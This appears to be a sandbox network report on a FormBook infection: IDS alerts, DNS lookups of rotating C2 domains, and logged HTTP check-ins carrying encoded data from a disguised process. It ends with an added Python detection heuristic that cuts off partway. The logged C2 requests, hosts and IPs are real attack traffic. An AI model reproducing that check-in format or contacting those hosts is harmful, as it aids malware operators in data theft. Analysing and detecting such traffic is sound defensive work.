2024-12-03T23:29:42.352365+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50039 | 209.74.77.107 | 80 | TCP
2024-12-03T23:29:45.015365+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50040 | 209.74.77.107 | 80 | TCP
2024-12-03T23:29:47.917261+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50041 | 209.74.77.107 | 80 | TCP
2024-12-03T23:29:50.452738+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50042 | 209.74.77.107 | 80 | TCP
2024-12-03T23:29:50.452738+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50042 | 209.74.77.107 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                          Dec 3, 2024 23:29:25.746995926 CET8050034154.88.22.101192.168.2.6
                                                          Dec 3, 2024 23:29:27.125540018 CET5003480192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:27.207071066 CET8050034154.88.22.101192.168.2.6
                                                          Dec 3, 2024 23:29:27.207199097 CET5003480192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:27.207734108 CET8050034154.88.22.101192.168.2.6
                                                          Dec 3, 2024 23:29:27.207833052 CET5003480192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:27.249778986 CET8050034154.88.22.101192.168.2.6
                                                          Dec 3, 2024 23:29:27.249831915 CET5003480192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:28.145584106 CET5003680192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:28.271981001 CET8050036154.88.22.101192.168.2.6
                                                          Dec 3, 2024 23:29:28.272073984 CET5003680192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:28.286525011 CET5003680192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:28.412664890 CET8050036154.88.22.101192.168.2.6
                                                          Dec 3, 2024 23:29:29.797405005 CET5003680192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:29.834085941 CET8050036154.88.22.101192.168.2.6
                                                          Dec 3, 2024 23:29:29.834101915 CET8050036154.88.22.101192.168.2.6
                                                          Dec 3, 2024 23:29:29.834151030 CET5003680192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:29.834173918 CET5003680192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:29.921499968 CET8050036154.88.22.101192.168.2.6
                                                          Dec 3, 2024 23:29:29.921554089 CET5003680192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:30.816011906 CET5003780192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:30.941046953 CET8050037154.88.22.101192.168.2.6
                                                          Dec 3, 2024 23:29:30.941360950 CET5003780192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:30.957195997 CET5003780192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:31.081681967 CET8050037154.88.22.101192.168.2.6
                                                          Dec 3, 2024 23:29:31.082694054 CET8050037154.88.22.101192.168.2.6
                                                          Dec 3, 2024 23:29:32.471179008 CET5003780192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:32.595621109 CET8050037154.88.22.101192.168.2.6
                                                          Dec 3, 2024 23:29:32.595690012 CET5003780192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:33.487848043 CET5003880192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:33.612696886 CET8050038154.88.22.101192.168.2.6
                                                          Dec 3, 2024 23:29:33.612798929 CET5003880192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:33.621771097 CET5003880192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:33.746406078 CET8050038154.88.22.101192.168.2.6
                                                          Dec 3, 2024 23:29:35.274543047 CET8050038154.88.22.101192.168.2.6
                                                          Dec 3, 2024 23:29:35.274557114 CET8050038154.88.22.101192.168.2.6
                                                          Dec 3, 2024 23:29:35.274693012 CET5003880192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:35.277264118 CET5003880192.168.2.6154.88.22.101
                                                          Dec 3, 2024 23:29:35.401048899 CET8050038154.88.22.101192.168.2.6
                                                          Dec 3, 2024 23:29:40.905572891 CET5003980192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:41.029295921 CET8050039209.74.77.107192.168.2.6
                                                          Dec 3, 2024 23:29:41.029381990 CET5003980192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:41.043953896 CET5003980192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:41.167892933 CET8050039209.74.77.107192.168.2.6
                                                          Dec 3, 2024 23:29:42.352122068 CET8050039209.74.77.107192.168.2.6
                                                          Dec 3, 2024 23:29:42.352313042 CET8050039209.74.77.107192.168.2.6
                                                          Dec 3, 2024 23:29:42.352365017 CET5003980192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:42.547301054 CET5003980192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:43.565731049 CET5004080192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:43.689469099 CET8050040209.74.77.107192.168.2.6
                                                          Dec 3, 2024 23:29:43.689601898 CET5004080192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:43.703735113 CET5004080192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:43.827627897 CET8050040209.74.77.107192.168.2.6
                                                          Dec 3, 2024 23:29:45.015003920 CET8050040209.74.77.107192.168.2.6
                                                          Dec 3, 2024 23:29:45.015117884 CET8050040209.74.77.107192.168.2.6
                                                          Dec 3, 2024 23:29:45.015364885 CET5004080192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:45.219392061 CET5004080192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:46.381758928 CET5004180192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:46.505497932 CET8050041209.74.77.107192.168.2.6
                                                          Dec 3, 2024 23:29:46.505671978 CET5004180192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:46.521192074 CET5004180192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:46.644969940 CET8050041209.74.77.107192.168.2.6
                                                          Dec 3, 2024 23:29:46.645065069 CET8050041209.74.77.107192.168.2.6
                                                          Dec 3, 2024 23:29:47.916810036 CET8050041209.74.77.107192.168.2.6
                                                          Dec 3, 2024 23:29:47.917035103 CET8050041209.74.77.107192.168.2.6
                                                          Dec 3, 2024 23:29:47.917260885 CET5004180192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:48.031620979 CET5004180192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:49.054363012 CET5004280192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:49.178395033 CET8050042209.74.77.107192.168.2.6
                                                          Dec 3, 2024 23:29:49.178474903 CET5004280192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:49.187618017 CET5004280192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:49.311752081 CET8050042209.74.77.107192.168.2.6
                                                          Dec 3, 2024 23:29:50.450774908 CET8050042209.74.77.107192.168.2.6
                                                          Dec 3, 2024 23:29:50.450913906 CET8050042209.74.77.107192.168.2.6
                                                          Dec 3, 2024 23:29:50.452738047 CET5004280192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:50.453579903 CET5004280192.168.2.6209.74.77.107
                                                          Dec 3, 2024 23:29:50.577394962 CET8050042209.74.77.107192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 3, 2024 23:27:35.730882883 CET | 50849 | 53 | 192.168.2.6 | 1.1.1.1
Dec 3, 2024 23:27:36.295115948 CET | 53 | 50849 | 1.1.1.1 | 192.168.2.6
Dec 3, 2024 23:27:52.723567009 CET | 61424 | 53 | 192.168.2.6 | 1.1.1.1
Dec 3, 2024 23:27:53.411708117 CET | 53 | 61424 | 1.1.1.1 | 192.168.2.6
Dec 3, 2024 23:28:08.427218914 CET | 52700 | 53 | 192.168.2.6 | 1.1.1.1
Dec 3, 2024 23:28:09.438735962 CET | 52700 | 53 | 192.168.2.6 | 1.1.1.1
Dec 3, 2024 23:28:09.483894110 CET | 53 | 52700 | 1.1.1.1 | 192.168.2.6
Dec 3, 2024 23:28:09.581861019 CET | 53 | 52700 | 1.1.1.1 | 192.168.2.6
Dec 3, 2024 23:28:24.316839933 CET | 57204 | 53 | 192.168.2.6 | 1.1.1.1
Dec 3, 2024 23:28:25.314013004 CET | 57204 | 53 | 192.168.2.6 | 1.1.1.1
Dec 3, 2024 23:28:25.458901882 CET | 53 | 57204 | 1.1.1.1 | 192.168.2.6
Dec 3, 2024 23:28:25.460133076 CET | 53 | 57204 | 1.1.1.1 | 192.168.2.6
Dec 3, 2024 23:28:40.078064919 CET | 62679 | 53 | 192.168.2.6 | 1.1.1.1
Dec 3, 2024 23:28:40.597383976 CET | 53 | 62679 | 1.1.1.1 | 192.168.2.6
Dec 3, 2024 23:28:55.181200027 CET | 64237 | 53 | 192.168.2.6 | 1.1.1.1
Dec 3, 2024 23:28:55.497526884 CET | 53 | 64237 | 1.1.1.1 | 192.168.2.6
Dec 3, 2024 23:29:09.942214012 CET | 62679 | 53 | 192.168.2.6 | 1.1.1.1
Dec 3, 2024 23:29:10.351916075 CET | 53 | 62679 | 1.1.1.1 | 192.168.2.6
Dec 3, 2024 23:29:24.941406965 CET | 49239 | 53 | 192.168.2.6 | 1.1.1.1
Dec 3, 2024 23:29:25.481693029 CET | 53 | 49239 | 1.1.1.1 | 192.168.2.6
Dec 3, 2024 23:29:40.285471916 CET | 57486 | 53 | 192.168.2.6 | 1.1.1.1
Dec 3, 2024 23:29:40.903224945 CET | 53 | 57486 | 1.1.1.1 | 192.168.2.6
Dec 3, 2024 23:29:55.952630043 CET | 54684 | 53 | 192.168.2.6 | 1.1.1.1
Dec 3, 2024 23:29:56.580615044 CET | 53 | 54684 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 3, 2024 23:27:35.730882883 CET | 192.168.2.6 | 1.1.1.1 | 0x3cfa | Standard query (0) | www.nb-shenshi.buzz | A (IP address) | IN (0x0001) | false
Dec 3, 2024 23:27:52.723567009 CET | 192.168.2.6 | 1.1.1.1 | 0xe90f | Standard query (0) | www.laohub10.net | A (IP address) | IN (0x0001) | false
Dec 3, 2024 23:28:08.427218914 CET | 192.168.2.6 | 1.1.1.1 | 0xf3c5 | Standard query (0) | www.xcvbj.asia | A (IP address) | IN (0x0001) | false
Dec 3, 2024 23:28:09.438735962 CET | 192.168.2.6 | 1.1.1.1 | 0xf3c5 | Standard query (0) | www.xcvbj.asia | A (IP address) | IN (0x0001) | false
Dec 3, 2024 23:28:24.316839933 CET | 192.168.2.6 | 1.1.1.1 | 0x4ad5 | Standard query (0) | www.soainsaat.xyz | A (IP address) | IN (0x0001) | false
Dec 3, 2024 23:28:25.314013004 CET | 192.168.2.6 | 1.1.1.1 | 0x4ad5 | Standard query (0) | www.soainsaat.xyz | A (IP address) | IN (0x0001) | false
Dec 3, 2024 23:28:40.078064919 CET | 192.168.2.6 | 1.1.1.1 | 0xf254 | Standard query (0) | www.amayavp.xyz | A (IP address) | IN (0x0001) | false
Dec 3, 2024 23:28:55.181200027 CET | 192.168.2.6 | 1.1.1.1 | 0x6481 | Standard query (0) | www.vayui.top | A (IP address) | IN (0x0001) | false
Dec 3, 2024 23:29:09.942214012 CET | 192.168.2.6 | 1.1.1.1 | 0x2bd4 | Standard query (0) | www.rgenerousrs.store | A (IP address) | IN (0x0001) | false
Dec 3, 2024 23:29:24.941406965 CET | 192.168.2.6 | 1.1.1.1 | 0xfa26 | Standard query (0) | www.t91rl7.pro | A (IP address) | IN (0x0001) | false
Dec 3, 2024 23:29:40.285471916 CET | 192.168.2.6 | 1.1.1.1 | 0x4b80 | Standard query (0) | www.learnwithus.site | A (IP address) | IN (0x0001) | false
Dec 3, 2024 23:29:55.952630043 CET | 192.168.2.6 | 1.1.1.1 | 0xc8be | Standard query (0) | www.cuthethoi.online | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 3, 2024 23:27:36.295115948 CET | 1.1.1.1 | 192.168.2.6 | 0x3cfa | No error (0) | www.nb-shenshi.buzz | | 161.97.168.245 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 23:27:53.411708117 CET | 1.1.1.1 | 192.168.2.6 | 0xe90f | No error (0) | www.laohub10.net | r0lqcud7.nbnnn.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Dec 3, 2024 23:27:53.411708117 CET | 1.1.1.1 | 192.168.2.6 | 0xe90f | No error (0) | r0lqcud7.nbnnn.xyz | | 27.124.4.246 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 23:27:53.411708117 CET | 1.1.1.1 | 192.168.2.6 | 0xe90f | No error (0) | r0lqcud7.nbnnn.xyz | | 202.79.161.151 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 23:27:53.411708117 CET | 1.1.1.1 | 192.168.2.6 | 0xe90f | No error (0) | r0lqcud7.nbnnn.xyz | | 23.225.159.42 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 23:27:53.411708117 CET | 1.1.1.1 | 192.168.2.6 | 0xe90f | No error (0) | r0lqcud7.nbnnn.xyz | | 23.225.160.132 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 23:28:09.483894110 CET | 1.1.1.1 | 192.168.2.6 | 0xf3c5 | No error (0) | www.xcvbj.asia | | 149.88.81.190 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 23:28:09.581861019 CET | 1.1.1.1 | 192.168.2.6 | 0xf3c5 | No error (0) | www.xcvbj.asia | | 149.88.81.190 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 23:28:25.458901882 CET | 1.1.1.1 | 192.168.2.6 | 0x4ad5 | No error (0) | www.soainsaat.xyz | redirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 3, 2024 23:28:25.458901882 CET | 1.1.1.1 | 192.168.2.6 | 0x4ad5 | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 3, 2024 23:28:25.458901882 CET | 1.1.1.1 | 192.168.2.6 | 0x4ad5 | No error (0) | natroredirect.natrocdn.com | | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 23:28:25.460133076 CET | 1.1.1.1 | 192.168.2.6 | 0x4ad5 | No error (0) | www.soainsaat.xyz | redirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 3, 2024 23:28:25.460133076 CET | 1.1.1.1 | 192.168.2.6 | 0x4ad5 | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 3, 2024 23:28:25.460133076 CET | 1.1.1.1 | 192.168.2.6 | 0x4ad5 | No error (0) | natroredirect.natrocdn.com | | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 23:28:40.597383976 CET | 1.1.1.1 | 192.168.2.6 | 0xf254 | No error (0) | www.amayavp.xyz | | 185.27.134.144 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 23:28:55.497526884 CET | 1.1.1.1 | 192.168.2.6 | 0x6481 | No error (0) | www.vayui.top | | 172.67.145.234 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 23:28:55.497526884 CET | 1.1.1.1 | 192.168.2.6 | 0x6481 | No error (0) | www.vayui.top | | 104.21.95.160 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 23:29:10.351916075 CET | 1.1.1.1 | 192.168.2.6 | 0x2bd4 | No error (0) | www.rgenerousrs.store | | 172.67.167.146 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 23:29:10.351916075 CET | 1.1.1.1 | 192.168.2.6 | 0x2bd4 | No error (0) | www.rgenerousrs.store | | 104.21.57.248 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 23:29:25.481693029 CET | 1.1.1.1 | 192.168.2.6 | 0xfa26 | No error (0) | www.t91rl7.pro | | 154.88.22.101 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 23:29:40.903224945 CET | 1.1.1.1 | 192.168.2.6 | 0x4b80 | No error (0) | www.learnwithus.site | | 209.74.77.107 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 23:29:56.580615044 CET | 1.1.1.1 | 192.168.2.6 | 0xc8be | Server failure (2) | www.cuthethoi.online | none | none | A (IP address) | IN (0x0001) | false
                                                          • www.nb-shenshi.buzz
                                                          • www.laohub10.net
                                                          • www.xcvbj.asia
                                                          • www.soainsaat.xyz
                                                          • www.amayavp.xyz
                                                          • www.vayui.top
                                                          • www.rgenerousrs.store
                                                          • www.t91rl7.pro
                                                          • www.learnwithus.site
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49808 | 161.97.168.245 | 80 | 768 | C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 23:27:36.438179016 CET | 507 | OUT | GET /xxr1/?b6=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM65kw/IL4BQaU5/Yfn2j/HOFiURDDVRtX+aUGy8uGla3Axtt/A0yI=&sDDX=EfDhNx4xefjT3b5P HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.nb-shenshi.buzz
                                                          Connection: close
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
Dec 3, 2024 23:27:37.679775000 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 03 Dec 2024 22:27:37 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Content-Length: 2966
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          ETag: "66cd104a-b96"
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
Dec 3, 2024 23:27:37.679797888 CET | 1236 | IN | Data Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                          Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
Dec 3, 2024 23:27:37.679811001 CET | 698 | IN | Data Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                          Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49847 | 27.124.4.246 | 80 | 768 | C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 23:27:53.554835081 CET | 754 | OUT | POST /sgdd/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.laohub10.net
                                                          Origin: http://www.laohub10.net
                                                          Referer: http://www.laohub10.net/sgdd/
                                                          Cache-Control: no-cache
                                                          Content-Length: 207
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 62 36 3d 71 33 44 38 31 64 48 54 67 48 57 32 6a 59 73 72 6b 77 50 4a 52 64 37 46 6c 50 47 57 48 6e 59 4c 39 47 34 63 70 6d 52 67 66 50 38 6f 4f 32 44 6e 4f 65 5a 41 49 76 79 58 48 2b 62 71 35 46 30 39 4f 72 32 55 78 73 7a 59 59 46 4c 2b 6d 59 51 42 56 62 2b 34 42 68 2f 42 45 78 64 77 73 34 39 68 70 55 33 41 44 31 4a 2b 41 32 56 4b 41 33 39 76 53 76 2b 44 64 2b 67 6a 59 37 72 31 4a 64 71 32 4d 6e 5a 56 4a 69 59 77 69 4f 36 65 39 69 46 77 39 50 64 70 78 6b 76 61 69 2b 6f 73 4d 4f 77 4c 65 34 36 63 61 31 4d 5a 39 73 73 51 66 6c 58 34 69 6a 2f 61 2b 57 44 44 38 76 72 6e 51 68 2f 4a 59 47 78 75 50 78 63 4b 77 47 55 50
                                                          Data Ascii: b6=q3D81dHTgHW2jYsrkwPJRd7FlPGWHnYL9G4cpmRgfP8oO2DnOeZAIvyXH+bq5F09Or2UxszYYFL+mYQBVb+4Bh/BExdws49hpU3AD1J+A2VKA39vSv+Dd+gjY7r1Jdq2MnZVJiYwiO6e9iFw9Pdpxkvai+osMOwLe46ca1MZ9ssQflX4ij/a+WDD8vrnQh/JYGxuPxcKwGUP
Dec 3, 2024 23:27:54.936975002 CET | 525 | IN | HTTP/1.1 200 OK
                                                          Server: Apache
                                                          Content-Type: text/html; charset=utf-8
                                                          Accept-Ranges: bytes
                                                          Cache-Control: max-age=86400
                                                          Age: 1
                                                          Connection: Close
                                                          Content-Length: 350
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED]
                                                          Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>
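
The DNS and HTTP tables above show one process (CWtKbasqHVKAO.exe, PID 768) resolving a fresh, unrelated domain roughly every fifteen seconds and sending each one a single long base64-looking parameter to a short directory path, while presenting a mobile UC Browser User-Agent from a Windows host. The script below is an added example written for this page; it is not part of the Joe Sandbox report and not FormBook tooling. It runs two detection heuristics over those observations: a cadence check on first-seen DNS names and a shape check on the HTTP requests. The DNS lines and the two requests are copied from the rows above (timestamps truncated to microseconds; the retransmitted queries are kept); the Chrome request is a constructed negative control, and the thresholds, the base64 pattern, the path pattern and the "process" field are assumptions of this example.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import median

# Constructed sample input: the DNS query rows of this report, one per line,
# timestamps truncated to microseconds. The two retransmitted queries
# (www.xcvbj.asia, www.soainsaat.xyz) are kept so the dedupe below is exercised.
DNS_QUERIES = """\
2024-12-03 23:27:35.730882 192.168.2.6 www.nb-shenshi.buzz
2024-12-03 23:27:52.723567 192.168.2.6 www.laohub10.net
2024-12-03 23:28:08.427218 192.168.2.6 www.xcvbj.asia
2024-12-03 23:28:09.438735 192.168.2.6 www.xcvbj.asia
2024-12-03 23:28:24.316839 192.168.2.6 www.soainsaat.xyz
2024-12-03 23:28:25.314013 192.168.2.6 www.soainsaat.xyz
2024-12-03 23:28:40.078064 192.168.2.6 www.amayavp.xyz
2024-12-03 23:28:55.181200 192.168.2.6 www.vayui.top
2024-12-03 23:29:09.942214 192.168.2.6 www.rgenerousrs.store
2024-12-03 23:29:24.941406 192.168.2.6 www.t91rl7.pro
2024-12-03 23:29:40.285471 192.168.2.6 www.learnwithus.site
2024-12-03 23:29:55.952630 192.168.2.6 www.cuthethoi.online
"""

# User-Agent string the sample sends in every HTTP session above.
MOBILE_UA = ("UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) "
             "U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile")

# Constructed sample input: sessions 0 and 1 from the report, plus one ordinary
# browser request as a negative control (the control, its UA and "process" are made up).
HTTP_REQUESTS = [
    {"method": "GET", "host": "www.nb-shenshi.buzz", "path": "/xxr1/",
     "query": "b6=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM65kw/IL4BQaU5/Yfn2j/HOFiURDDVRtX+aUGy8uGla3Axtt/A0yI=&sDDX=EfDhNx4xefjT3b5P",
     "body": "", "referer": "", "ua": MOBILE_UA, "process": "CWtKbasqHVKAO.exe"},
    {"method": "POST", "host": "www.laohub10.net", "path": "/sgdd/", "query": "",
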